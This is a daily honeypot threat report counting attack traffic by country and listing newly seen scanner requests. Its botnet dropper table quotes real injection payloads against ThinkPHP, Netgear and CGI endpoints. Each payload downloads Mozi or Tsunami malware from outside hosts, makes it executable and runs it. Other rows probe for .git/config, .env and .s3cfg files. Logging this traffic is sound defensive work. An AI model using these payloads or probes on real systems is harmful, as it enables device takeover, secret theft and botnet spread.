
Report: 2025-04-04

Author: Shoggoth Industries

Daily Report: 2025-04-04

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 18 stage 1 IP address(es), linked to 7 dropper URL(s).

There are 155 new requests that had never been observed before (these were added to the monitored request database).

A total of 2998 requests were recorded during the day, originating from 18 different countries, with a peak of 1019 requests coming from NL.

ot_simplified_report

Simplified report of medium-level interactions with honeypots that mimic industrial systems (loading the web site, or interacting with it). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
|---|---|
| SC | Germany |
| SC | Germany |
| US | Dubai |
| US | Dubai |
| CN | Georgia |

botnet_dropper_behaviour

| remote_addr | request |
|---|---|
| 185.191.127.222 | `POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=wget%20http%3A%2F%2F45.87.43.37%2Ftbk%20-O-%20%7C%20sh HTTP/1.1` |
| 31.170.22.205 | `GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/tmp;wget+http://31.170.22.205/dl18;busybox+wget+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1` |
| 103.207.124.41 | `GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.207.124.41:46234/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0` |
| 185.197.140.156 | `GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://185.197.140.156:52968/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0` |
| 114.76.203.37 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1` |
| 58.58.30.134 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1` |
| 181.170.159.56 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1` |
| 87.107.80.243 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘rm -rf bejv86; wget http://176.65.134.201/bejv86 -O /tmp/.Aqua; chmod 777 /tmp/.Aqua; /tmp/.Aqua thinkphp.selfrep’ HTTP/1.1` |
| 90.214.52.113 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1` |
| 162.221.50.82 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1` |
| 207.188.188.206 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1` |
| 58.96.82.116 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1` |
| 79.116.24.116 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1` |
| 90.248.112.248 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1` |
| 211.72.164.193 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1` |
| 140.207.30.37 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1` |
| 36.27.117.227 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1` |
| 81.86.131.239 | `GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1` |

request

The requests listed here are those that had not yet been integrated into the request database.

| number_of_occurence | request |
|---|---|
| 5 | `GET /splarm6 HTTP/1.1` |
| 4 | `GET /check HTTP/1.1` |
| 2 | `GET /.s3cfg HTTP/1.1` |
| 2 | `GET /arm6.nn HTTP/1.1` |
| 2 | `GET /m68k.nn HTTP/1.1` |
| 2 | `GET /crm/.env.production HTTP/1.1` |
| 1 | `GET /static/.git/config HTTP/1.1` |
| 1 | `GET /IOebhLMhl1CTbFHbL95myfRX2 HTTP/1.1` |
| 1 | `GET /agSearch/SQlite/users/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /agSearch/SQlite/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /agSearch/SQlite/users/users/users/login HTTP/1.1` |
| 1 | `GET /agSearch/SQlite/users/users/login HTTP/1.1` |
| 1 | `GET /SQLiteManager/users/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /SQLite/main.php HTTP/1.1` |
| 1 | `GET /SQLite/users/login HTTP/1.1` |
| 1 | `GET /SQLite/users/users/login HTTP/1.1` |
| 1 | `GET /SQLite/users/users/users/login HTTP/1.1` |
| 1 | `GET /SQLite/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /SQLite/users/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /SQlite/main.php HTTP/1.1` |
| 1 | `GET /SQlite/users/login HTTP/1.1` |
| 1 | `GET /SQlite/users/users/login HTTP/1.1` |
| 1 | `GET /SQlite/users/users/users/login HTTP/1.1` |
| 1 | `GET /SQlite/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /SQlite/users/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1` |
| 1 | `GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/login HTTP/1.1` |
| 1 | `GET /testing/.git/config HTTP/1.1` |
| 1 | `GET /protected/.git/config HTTP/1.1` |
| 1 | `GET /sources/.git/config HTTP/1.1` |
| 1 | `GET /stage/.git/config HTTP/1.1` |
| 1 | `GET //.git/config HTTP/1.1` |
| 1 | `GET /blog/wp-content/themes/.git/config HTTP/1.1` |
| 1 | `GET /samples/.git/config HTTP/1.1` |
| 1 | `GET /git/.git/config HTTP/1.1` |
| 1 | `GET /live/.git/config HTTP/1.1` |
| 1 | `GET /wiki/.git/config HTTP/1.1` |
| 1 | `GET /misc/.git/config HTTP/1.1` |
| 1 | `GET /mobile/.git/config HTTP/1.1` |
| 1 | `GET /private/.git/config HTTP/1.1` |
| 1 | `GET /styles/.git/config HTTP/1.1` |
| 1 | `GET /libraries/.git/config HTTP/1.1` |
| 1 | `GET /magento/.git/config HTTP/1.1` |
| 1 | `GET /mail/.git/config HTTP/1.1` |
| 1 | `GET /node_modules/.git/config HTTP/1.1` |
| 1 | `GET /projects/.git/config HTTP/1.1` |
| 1 | `GET /release/.git/config HTTP/1.1` |
| 1 | `GET /services/.git/config HTTP/1.1` |
| 1 | `GET /old/.git/config HTTP/1.1` |
| 1 | `GET /old-site/.git/config HTTP/1.1` |
| 1 | `GET /plugins/.git/config HTTP/1.1` |
| 1 | `GET /portal/.git/config HTTP/1.1` |
| 1 | `GET /resources/.git/config HTTP/1.1` |
| 1 | `GET /uploads/.git/config HTTP/1.1` |
| 1 | `GET /system/.git/config HTTP/1.1` |
| 1 | `GET /legacy/.git/config HTTP/1.1` |
| 1 | `GET /maintenance/.git/config HTTP/1.1` |
| 1 | `GET /member/.git/config HTTP/1.1` |
| 1 | `GET /tmp/.git/config HTTP/1.1` |
| 1 | `GET /platform/.git/config HTTP/1.1` |
| 1 | `GET /sites/.git/config HTTP/1.1` |
| 1 | `GET /themes/.git/config HTTP/1.1` |
| 1 | `GET /laravel/.git/config HTTP/1.1` |
| 1 | `GET /resource/.git/config HTTP/1.1` |
| 1 | `GET /secure/.git/config HTTP/1.1` |
| 1 | `GET /storage/.git/config HTTP/1.1` |
| 1 | `GET /js/.git/config HTTP/1.1` |
| 1 | `GET /login/.git/config HTTP/1.1` |
| 1 | `GET /main/.git/config HTTP/1.1` |
| 1 | `GET /php/.git/config HTTP/1.1` |
| 1 | `GET /support/.git/config HTTP/1.1` |
| 1 | `GET /migrations/.git/config HTTP/1.1` |
| 1 | `GET /panel/.git/config HTTP/1.1` |
| 1 | `GET /partners/.git/config HTTP/1.1` |
| 1 | `GET /odinhttpcall1743775311 HTTP/1.1` |
| 1 | `GET /OdinHttpCall1743775311 HTTP/1.1` |
| 1 | `GET /Odin/http/call1743775311 HTTP/1.1` |
| 1 | `\x80\x00\x00(\xCA\xFE\xCA\xFE\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xA5\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00` |
| 1 | `\x00\x0E\x08\x02\x00\xDC\x80` |
| 1 | `GET /managemen%74; HTTP/1.1` |
| 1 | `\x00\x0E\x08\x88\x03J\x1Ak]\xA6x\x00\x00\x00\x00\x00` |
| 1 | `\x00\x0E8\x88\x03J\x1Ak]\xA6x\x00\x00\x00\x00\x00` |
| 1 | `GET /web/.git/config HTTP/1.1` |
| 1 | `GET /common/.git/config HTTP/1.1` |
| 1 | `GET /repos/.git/config HTTP/1.1` |
| 1 | `GET /repository/.git/config HTTP/1.1` |
| 1 | `GET /s3/.git/config HTTP/1.1` |
| 1 | `POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1` |
| 1 | `GET /dot.git/config HTTP/1.1` |
| 1 | `GET /wp-content/themes/.git/config HTTP/1.1` |
| 1 | `GET /store/.git/config HTTP/1.1` |
| 1 | `GET /odinhttpcall1743722111 HTTP/1.1` |
| 1 | `GET /OdinHttpCall1743722111 HTTP/1.1` |
| 1 | `GET /Odin/http/call1743722111 HTTP/1.1` |
| 1 | `POST /php/ping.php HTTP/1.1` |
| 1 | `GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /SQLiteManager-1.2.4/main.php HTTP/1.1` |
| 1 | `GET /database/.git/config HTTP/1.1` |
| 1 | `GET /flock/.git/config HTTP/1.1` |
| 1 | `GET /m/.git/config HTTP/1.1` |
| 1 | `GET /prod.git/config HTTP/1.1` |
| 1 | `GET /aomanalyzer/.git/config HTTP/1.1` |
| 1 | `GET /blog/.git/config HTTP/1.1` |
| 1 | `GET /managemen%74;/actuator; HTTP/1.1` |
| 1 | `GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/users/login HTTP/1.1` |
| 1 | `GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/users/users/login HTTP/1.1` |
| 1 | `GET /C:/Users/Arkadi_PC/Downloads/kali-wordlists/dirb/big.txt HTTP/1.1` |
| 1 | `GET /hudson/script HTTP/1.1` |
| 1 | `GET /hudson/users/login HTTP/1.1` |
| 1 | `GET /hudson/users/users/login HTTP/1.1` |
| 1 | `GET /hudson/users/users/users/login HTTP/1.1` |
| 1 | `GET /hudson/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /hudson/users/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /script HTTP/1.1` |
| 1 | `GET /sqlite/main.php HTTP/1.1` |
| 1 | `GET /sqlite/users/login HTTP/1.1` |
| 1 | `GET /sqlite/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /sqlite/users/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /sqlitemanager/main.php HTTP/1.1` |
| 1 | `GET /sqlitemanager/users/login HTTP/1.1` |
| 1 | `GET /sqlitemanager/users/users/login HTTP/1.1` |
| 1 | `GET /sqlitemanager/users/users/users/login HTTP/1.1` |
| 1 | `GET /sqlitemanager/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /sqlitemanager/users/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /SQLiteManager/main.php HTTP/1.1` |
| 1 | `GET /SQLiteManager/users/login HTTP/1.1` |
| 1 | `GET /SQLiteManager/users/users/login HTTP/1.1` |
| 1 | `GET /SQLiteManager/users/users/users/login HTTP/1.1` |
| 1 | `GET /SQLiteManager/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /agSearch/SQlite/users/login HTTP/1.1` |
| 1 | `GET /wp-includes/js/.git/config HTTP/1.1` |
| 1 | `GET /a/.git/config HTTP/1.1` |
| 1 | `GET /shop/.git/config HTTP/1.1` |
| 1 | `GET /wp-content/.git/config HTTP/1.1` |
| 1 | `GET /__macosx/.git/config HTTP/1.1` |
| 1 | `GET /awsconf.git/config HTTP/1.1` |
| 1 | `GET /beta/.git/config HTTP/1.1` |
| 1 | `GET /application/.git/config HTTP/1.1` |
| 1 | `GET /wp-content/plugins/.git/config HTTP/1.1` |
| 1 | `GET /.git/configf HTTP/1.1` |
| 1 | `GET /amphtml/.git/config HTTP/1.1` |
| 1 | `GET /new/.git/config HTTP/1.1` |
| 1 | `GET /old-cuburn/.git/config HTTP/1.1` |
| 1 | `GET /developer/.git/config HTTP/1.1` |
| 1 | `GET /qa/.git/config HTTP/1.1` |
| 1 | `GET /vendor/.git/config HTTP/1.1` |
| 1 | `GET /demo/.git/config HTTP/1.1` |
| 1 | `GET /site/.git/config HTTP/1.1` |
| 1 | `GET /SQLiteManager-1.2.4/users/login HTTP/1.1` |
| 1 | `GET /SQLiteManager-1.2.4/users/users/login HTTP/1.1` |
| 1 | `GET /SQLiteManager-1.2.4/users/users/users/login HTTP/1.1` |
| 1 | `GET /SQLiteManager-1.2.4/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /SQLiteManager-1.2.4/users/users/users/users/users/login HTTP/1.1` |
| 1 | `GET /agSearch/SQlite/main.php HTTP/1.1` |

country_iso_code

| number_of_occurence | country_iso_code |
|---|---|
| 1019 | NL |
| 405 | BG |
| 342 | SC |
| 237 | GB |
| 202 | US |
| 174 | HK |
| 130 | DE |
| 84 | IL |
| 63 | PL |
| 51 | TW |
| 47 | AZ |
| 43 | CN |
| 35 | CA |
| 22 | IN |
| 19 | NO |
| 19 | FR |
| 17 | JP |
| 12 | NG |
| 10 | KR |
| 6 | IT |
| 6 | BE |
| 5 | LV |
| 5 | AU |
| 4 | CH |
| 4 | ZA |
| 4 | ID |
| 4 | RU |
| 4 | AR |
| 4 | PT |
| 3 | ES |
| 3 | VN |
| 3 | UA |
| 2 | BR |
| 2 | LT |
| 1 | RO |
| 1 | SI |
| 1 | MK |
| 1 | SE |
| 1 | PK |
| 1 | AE |
| 1 | IR |
| 1 | CZ |
